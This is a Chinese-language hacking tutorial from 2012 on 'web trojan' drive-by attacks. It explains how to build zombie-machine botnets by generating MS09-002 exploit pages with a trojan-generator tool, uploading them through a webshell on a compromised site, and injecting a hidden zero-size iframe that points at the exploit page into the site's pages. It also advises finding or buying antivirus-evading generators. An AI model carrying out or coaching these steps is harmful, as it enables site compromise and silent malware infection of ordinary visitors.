热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

揭示 网页挂马技术的秘密

发布时间:2012-09-05 17:59文章来源:网络文章作者:秩名 点击次数:
摘要:首先说什么是网马,网马有什么用呢?例如,大家想玩鸽子,想找肉鸡。想找很多很多的肉鸡。当然方法很多,例如135抓鸡什么的。但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串一串的。我自己操作为啥老半天就扫不到呢?因为这漏洞出来很久了...

  首先说什么是网马,网马有什么用呢?例如,大家想玩鸽子,想找肉鸡。想找很多很多的肉鸡。当然方法很多,例如135抓鸡什么的。但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串一串的。我自己操作为啥老半天就扫不到呢?因为这漏洞出来很久了,再者,天天有人扫肉鸡。当然肉鸡就少了,也很难找到。还有,大家扫描肉鸡的方法可能也有点不对。综合起来,利用这些漏洞找肉鸡的效率很低下。那么用网马呢,网马就是挂马。你想下。要是一个网站,一天有1万个人访问,一万个人中哪怕几率降低到%1的中马率。一天也有100个人中马成为你的肉鸡啊。而且,你挂上网马后关机睡觉肉鸡也刷刷刷的上来。所以网马很爽,所以也比自己拿个软件扫描漏洞来劲。

  上面说了网马的作用。综合叙述下,就是快捷,方便。更快,更高,更强的达到散播木马的途径。然后,大家应该明什么是网马了吧?对的,网马简单的说下,就是网页木马。当别人访问一个网页就可能从这个网页自动下载木马,并且在你后台悄悄运行。这就是网马。简单的这么理解,当然我们学黑客知识的肯定对这些东西不能简单理解了事了。但是,我们只是入门的小菜鸟,所以再深入了解一点点就行了。

  深入说下。什么是网马?网马就是利用网页代码操作win的漏洞。首先,我们得明白什么是网页。为什么我们打开一个网站,这个网站会显示出这些图片。就如你现在看的这篇帖子,为什么背景是这个颜色,为什么字体有大有小,为什么网页各处的颜色不同。然后构成了这样一个网页。怎么构成的?难道就是简简单单的几张图片就构成了我们现在看到的这个网页页面?错了。是图片+文字+代码。这是一个网页构成的基本元素。但是,代码是必须要的。这里提到了代码。例如一段网页由设计者设计,图片应该放这里,文字应该按照这样排列。这些设计,规划,就是代码来操作的。当设计者把网页代码编写好了。然后放在服务器上(一般来说是IIS服务器。IIS简单的说下,就是网页服务器。)进行服务器的解析。然后当你访问这个网站。那么就得到了你现在所看到的网页了。这里提到了代码。是的。不光服务器要分析代码。你的电脑也要解析分析代码。你的电脑分析了代码才能显示出这样的页面。所以大家可以在网页空白处,右键单击查看源文件就会看到代码了。当然,这个只是你单方面的代码,核心代码还是在服务器上。你这样看到的只是显示的页面解析的静态的页面代码。也就是说是HTM的代码。所以,你在浏览器上点,文件——另存为保存网页的时候都是HTM格式!

  上面说到了代码。下面说下漏洞。WIN这个操作系统有很多漏洞。我相信大家都知道,清楚。例如:MS06-04O这样的ms开头的漏洞名字。这些漏洞是怎么形成的呢。就是代码操作形成的。有些朋友就问了,代码怎么会出现漏洞呢。一时半会讲不清楚。举例吧,简单通俗的例子。例如x=取文本y=取X前三个数字这么一段代码。如果实际操作的时候,这个文本如果取出来时1234567那么X就等于1234567那么Y取的是X文本前三个数字那么Y就等于123.这么一段代码看是没问题。但是如果取不到文本呢。或者取到的文本数字就1个呢?比如X=1就一个数字。那么Y怎么取出前三个数字呢?遇到特殊情况,那么就有可能造成代码出错。当然,我这里是举例,为了大家简单,就用最最最通俗的例子给大家举例。具体代码不可能这么乱七八糟的。如果我们这段代码加个判断。如果X取到的数字小于3.那么Y就不取前三个数字,或者 Y就等于0.那么是不是什么事情都没了呢?但是,程序员一不小心,没注意,或者没看到这个代码的弊端。那么就有可能造成代码出错。造成了漏洞。以小画大,那么WIN的操作漏洞大多数也是类似的。由于程序代码的问题。被黑客发现了。那么就利用这段代码的漏洞,构造成别有用心的代码造成对电脑的破坏。当然,不局限于WIN系统。也可以是例如迅雷,暴风影音照样的第三方软件!

  口水很多。也不知道大家听懂了没有。我们来结合下。上面说到了访问网页其实就是根据网页,然后本地执行代码。然后显示在我们的电脑网页上面。WIN的漏洞就是代码漏洞。黑客编造一段利用这个代码的漏洞可以进行入侵。聪明的朋友应该想到了。访问网页要执行一些代码,win的漏洞要被利用需要执行一些特殊代码!所以。网马就是构造一段特殊的代码,当你电脑访问了执行了这段代码,正好你的电脑上有被这段代码利用的漏洞。那么!恭喜你,你就中网马了。

  网马就是这样形成的。所以,有些黑客很牛B的说。我就算是把我的管理员账号密码告诉你。你也入侵不了我的电脑。就如,你把你的网马发给我。我访问了。我照样没事。为啥,我电脑没漏洞,你怎么利用!呵呵,我想大家能理解了吧。

  当然,我们小菜鸟深入到这步了解就差不多了。如何找漏洞。如何找到漏洞构造此漏洞的代码编写。这就是黑客们的事情了。我们还没这个能力。下面说下网马制作。上文提到了,网马就是一段网页代码。当然,我们不懂这些代码如何编写。我们还是用别人的工具吧。网上也有很多网马生成工具。我随便找了一款。大家也可以自行去网上搜索寻找。

  首先,我们打开软件,我们可以看到。上面有很多ms这样开头选项。这就是WIN的系统漏洞利用。当然我们看到了有暴风,联众,等这样的。这就是第三方软件漏洞的利用了。这里,注意上面有个下载地址。什么是下载地址呢。就是我们木马的下载地址。我们把木马上传到网站上。然后获取到木马的下载地址。当然了。别人直接访问你的这个下载地址。系统会提示你是否下载的提示不说,别人不运行。木马就运行不了。所以这里要结合上网页代码。构造成一个网马。我本地做实验。就不上传木马了。假如,它上面填写的就是我的木马下载地址吧。我点ms9002.看到了吗?都是代码。网页代码!092.htm的代码意思是运行同目录下的ms09002.js.ms09002.js的大概意思是。利用ms09002的漏洞,自动下载我们上面指定的那个网址的木马后,自动运行。当然ms09002的代码是加密了的。我们也看不大实在!

  那么这两个文件就是我们的网马文件了。我们只需要把这两个文件上传到我们网站上。别人访问了这个网页,如果有ms09002这个漏洞,就可能中马!我们来上传吧。我用我的一个webshell给大家演示下吧。网马我就上传到我的webshell目录下!网马生成器,生成了两个文件,就上传两个。生成了一个,就上传一个。

  那么我们的网马地址在哪儿呢?我们的上传地址是:C:\inetpub\wwwroot\EasySite\Portals\95\cpzs \这个目录下。那么我们要访问的目录地址就是EasySite\Portals\95\cpzs\+网马名字我们网马是由092.htm调用运行同目录下的ms09002.js那么网马名字就是092.htm.那么访问地址就是http://www.******.com/EasySite /Portals/95/cpzs/092.htm到此。我们的网马就做好了。我们的ms09002漏洞网马地址就是http: //www.******.com/EasySite/Portals/95/cpzs/092.htm发给有此漏洞的朋友。如果他们电脑没网马拦截软件,或者没其他防御手段。那么极有可能中马!

  这里又说下。构成网马的代码很多种。当然,网上免费的,分两种。一种是黑客炫耀技术,故意放出来的。第二种,商业黑客,写的免费的给大家试用。对于这样公布了的网马生成器。有几个坏处。第一,中马效率低下。意思是说,有可能别人访问了你的网站根本不会中马。第二,容易被杀毒软件拦截。这个大家都清楚吧!第三,容易当别人的工具。可能免费的。里面的代码加入了工具制作者的网马。你挂上了网马,别人种了你的网马,也可能中了此工具制作者的网马!这就是导致很多朋友做的网马失效的原因!所以,对于网马生成器。大家可以耐心的去网上找找。肯定会找到一个中马率高,免杀的免费的。只不过需要花费大量的时间和精力去搜索然后测试。当然,有经济的朋友可以购买商业黑客的网马生成器。一般来说很不错的。如果购买请注意网络骗子!

  上面几大段谈了什么是网马用途,什么是网马,如何制作网马。下面我说说怎么挂马吧!

  挂马什么意思?出现这个概念的时候是基于网马之上的。我网马做出来了。不可能每个群,每个人去宣传我的网马地址吧。现在的人也聪明。一般的网址不点的。所以这里要用到挂马了。把这个网址附加到正常的网页上。当网友访问了正常的网页,也就不知不觉的中了你的网马了。

  用到的代码:[iframe xsrc="你的网马地址" name="lcx" width="0" height="0" frameborder="0"][/iframe]这句代码一般加在网页的末尾。例如我入侵了一个网站。我要在他的网站上挂马。例如在http: //****/EasySite/Portals/95/cpzs/image.asp这个页面上挂马。那么,我们进入webshell找到 image.asp这个页面。把:[iframe xsrc="你的网马地址"name="lcx"width="0" height="0" frameborder="0"][/iframe]这代码加入进去。上面网马做好了。那么就加入:[iframe xsrc="http://www.******.com/EasySite/Portals/95/cpzs/092.htm" name="lcx" width="0" height="0" frameborder="0"][/iframe]保存后。那么我们挂马就成功了。那么别人一访问http://****/EasySite /Portals/95/cpzs/image.asp这个正常页面。那么就会不知不觉也访问了你的网马网页,就会中了你的网马了。

  当然,如果你要挂在首页就在首页的文件里面加入代码。你如果要在整个网站的每个页面都挂马。那么每个页面都可以加入此代码。这就是挂马。

标签分类:

上一篇:Flashback木马简易版检测器
下一篇:LPK.dll劫持者木马清理解决方案